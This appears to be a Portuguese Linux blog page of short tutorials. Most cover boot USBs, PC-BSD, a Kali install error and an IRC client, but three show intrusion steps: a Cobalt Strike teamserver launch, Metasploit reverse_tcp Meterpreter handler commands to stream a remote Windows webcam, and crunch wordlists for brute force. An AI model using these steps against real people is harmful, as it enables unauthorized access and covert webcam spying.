Tutoriais

Tutoriais

Tutoriais prefirolinux

Invadindo com CobaltStrike ( kali Linux )

2

Boas Users!

Hoje irei mostrar como acessar um computador “windows” com o CobaltStrike

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

Comandos utilizados:

$ cd

cd= Navegar entre os diretórios

$ sudo ./teamserver 127.0.0.1 123456

sudo= Permissão de super usuário

./teamserver= Iniciando servidor do cobalt strike

127.0.0.1= IP LoopBack

123456= Senha

$ sudo ./cobaltstrike

./cobaltstrike= Iniciando o cobaltstrike

 

Fonte:

https://www.cobaltstrike.com/features

Softwares usados:

CobaltStrike

Toycon

Resource Hacker

 

By user777

Invadindo Webcam conectada no windows com “Kali Linux”

3

Boas Users!

Reforçando>> “Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

Hoje Iremos abordar como acessar, Webcam conectada a um S.O windows com o kali linux, lembrando que o video ja mostra logado no “msfconsole”, quem não sabe como fazer os passos anteriores, por favor acessem esse link que mostro como fazer.

 

Comandos usados no acesso;

use exploit/multi/handler

use exploit/multi/handler= Carregando módulo a ser usado

set payload windows/meterpreter/reverse_tcp

set payload windows/meterpreter/reverse_tcp= método utilizado

set lhost

set lhost= inserir o ip do kali

set lport

set lport= inserir a porta a ser utilizada

exploit

exploit = execução do backdoor

webcam_list

webcam_list= mostra se tem alguma webcam conectada

webcam_list

webcam_stream= abre a webcam remota, localmente

 

By user777

 

Gerando wordlist com crunch (kali linux)

0

Boas Users!

Aproveitando o belíssimo post do nosso amigo Thiago, sobre ataque de força bruta com o Hydra, vou mostrar como gerar sua própria wordlist.

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

 

Parâmetros do crunch:

$ sudo crunch 4 6 1234567890 -o /diretório/arquivo.lst

sudo= Permissão de super usuário

crunch= Gerador de wordlist

4= Mínimo de caracteres

6= Máximo de caracteres

1234567890= Números a serem gerados em ordens aleatória

-o= Faz com que em vez de serem apresentado no monitor os resultados dos nossos comandos, estes são escritos num ficheiro adicionados pelo parâmetro.

/diretório= Local onde será salvo o arquivo

$ sudo crunch 9 9 1234567890 -t maria@@@@ -o /diretório/arquivo.lst

-t= Inseri uma patente e modifica como entendermos. Sabemos que uma password é composta de um nome, neste caso maria mas de seguida é inserido 4 dígitos que não sabemos.

$ sudo crunch 9 9 1234567890 -t @@@@maria -o /diretório/arquivo.lst

Podemos inverter também, a sintaxe “maria@@@@”

$ sudo crunch 4 8 -f /usr/share/crunch/charset.lst mixalpha -o /diretório/arquivo.txt

Veja que nesse parâmetro do crunch, apliquei uma geração com o “charset”, uma wordlist ja pré-determinada, como “mixalpha” (letras maiúsculas e minúsculas).

Aqui foram alguns dos comandos e parâmetros do crunch, saiba mais aqui.

 

By user777

Criando Pendrive de Boot do Linux no Mac por linha de comando

0

Boas Users!

Criaremos um pendrive de boot no OS X

1- Conecte o pendrive no Mac, e acesse um terminal pelo Spotlight (⌘ + Tecla Espaço) ou diretamente através do diretório /Applications/Utilities/

2- Execute o seguinte comando no terminal, ” diskutil list ” o retorno do comando pode variar de acordo com o Mac

$diskutil list

1

3- Identifique o disco relativo ao Pendrive, neste caso, é o disk1

2

4- Desmonte o disco, com o comando “diskutil unmountDisk

$diskutil unmountDisk /dev/disk1

3

5- Com o comando o disco esteja desmontado, você poderá acessa-lo e altera-lo à baixo nível.

Localize a imagem ISO que deseja gravar no Pendrive ou copie-a para um local de fácil “acesso”.

Para efetuar a cópia, iremos utilizar o utilitário dd, o qual já se encontra disponível no Mac OS X.

Para saber mais sobre o dd, basta consultar o Manual, digitando “man dd” no Terminal.

A sintaxe básica do dd é:

dd if=origem of=destino

6- Substitua origem e destino, pelo arquivo ISO e pelo disco de destino respectivamente, logo teremos algo semelhante à:

dd if=ubuntu-13.04-server-amd64.iso of=/dev/rdisk1 bs=128m

OBS: Note que, para acelerar o processo de cópia, complementamos o comando, definindo parâmetro block size (bs) como 128m e alteramos o disco de destino incluindo um “r” antes de “disk1“.

bs indica que os blocos de leitura e escrita devem possuir o mesmo tamanho, enquanto que o “r” define que o disco deve ser acessado no modo raw.

Quando o processo de cópia for concluído, você receberá uma mensagem informando o tempo decorrido e a quantidade de bytes transferidos.

Tudo pronto, agora basta desconectar o Pendrive e utiliza-lo.

 

By user777

Instalação do PCBSD 10.3

0

 

PC-BSD é um sistema operacional Desktop baseado no FreeBSD.
Ao invés do usuário ter que baixar e configurar o seu próprio ambiente de trabalho o que pode ser demorado.
O PCBSD visa tornar a experiência FreeBSD fácil e viável para o usuário médio “casual”
Neste tutorial, vamos instalar o PCBSD 10.3.
Passo 1 – Transferir.
Clique Aqui para obter o PCBSD.

Passo 2 – Comece o Instalar.

Solução para o erro “Nenhuma unidade de CD-ROM comum foi detectada” Kali linux

0

Boas Users!

 

Diante do erro “Nenhuma unidade de CD-ROM comum foi detectada” a resolução é:

erro kali

 

1– esse erro ocorre geralmente, com pendrive.

2– ao aparecer essa tela de erro, retire o pendrive e coloque novamente e pressione enter.

3– se o erro permanecer, retire o pendrive novamente, sem desligar ou reiniciar o computador.

4– se estiver no windows, use o Daemon Tools para emular a ISO (se for windows 10 ele ja emula dando um duplo clique na ISO), formate o pendrive clicando com botão direito, e depois copie os arquivos de dentro da ISO para o pendrive, ao terminar, plugue novamente no computador que está sendo instalado o kali, e pressione enter novamente.

5–  se estiver no linux, Primeiro acesse o terminal como root:

su

Agora vamos acessar o /media:

# cd /media

E então crie um diretório onde deverá ser armazenado a nossa ISO:

# mkdir /diretorio_ISO

Agora é fácil montar a imagem .ISO, basta usar o comando abaixo. O comando “mount” que irá montar o nome da sua imagem ISO sem as aspas, o local onde está seu diretório para armazenar a ISO, o parâmetro “-o” como opção de montar tudo no fstab e o loop que executa o mount até o fim da ISO:

# mount “sua_Imagem.iso” /media/diretorio_ISO -o loop

 

 

By user777

Instalando “IRSSI” no kali linux cliente IRC

0

Boas Users!

Vamos instalar um cliente IRC, comunicação via terminal no kali linux.

1- abra o terminal e execute;

#apt-get install irssi

2- execute o irrsi no terminal;

#irssi

Captura de tela de 2016-07-21 01-06-40

3- Em seguida execute o comando abaixo para conectar a um servidor do irc;

/server freenode.net

OBS: usei o servidor da freenode como exemplo, você pode se conectar a qualquer servidor do IRC.

Captura de tela de 2016-07-21 01-14-52

4-Agora entraremos em uma sala ou também podemos criar uma sala se caso ela nao esteja criada, com o seguinte comando;

/join prefirolinux

Captura de tela de 2016-07-21 01-15-13

Pronto, nesse momento você certamente estará conectado a uma sala do IRC, para saber mais sobre os comandos acesse esse link e boa diversão.

 

 

By user777

 

 

 

 

 

 

 

Criando Pendrive de Boot Linux no Windows

0

Boas Users!

Criaremos um pendrive de boot do linux, no windows.

1- Faça o download do programa yumi, e execute-o

1

2- clique em I Agree

2

3- Selecione o pendrive, marque a opção “we will Fat32 Format D: Drive!“, clique em  “Browse” a ISO do Linux e clique em Create.

3

4

4- após o termino, clique em Next >

5

5- A seguir, o YUMI pergunta se quer adicionar outra ISO ao pendrive, se clicar em sim, fazer o mesmos processos anteriores, no nosso caso, clicaremos em não

6

6- e por último, clicamos em Finish, está pronto seu pendrive de boot do linux

7

 

By user777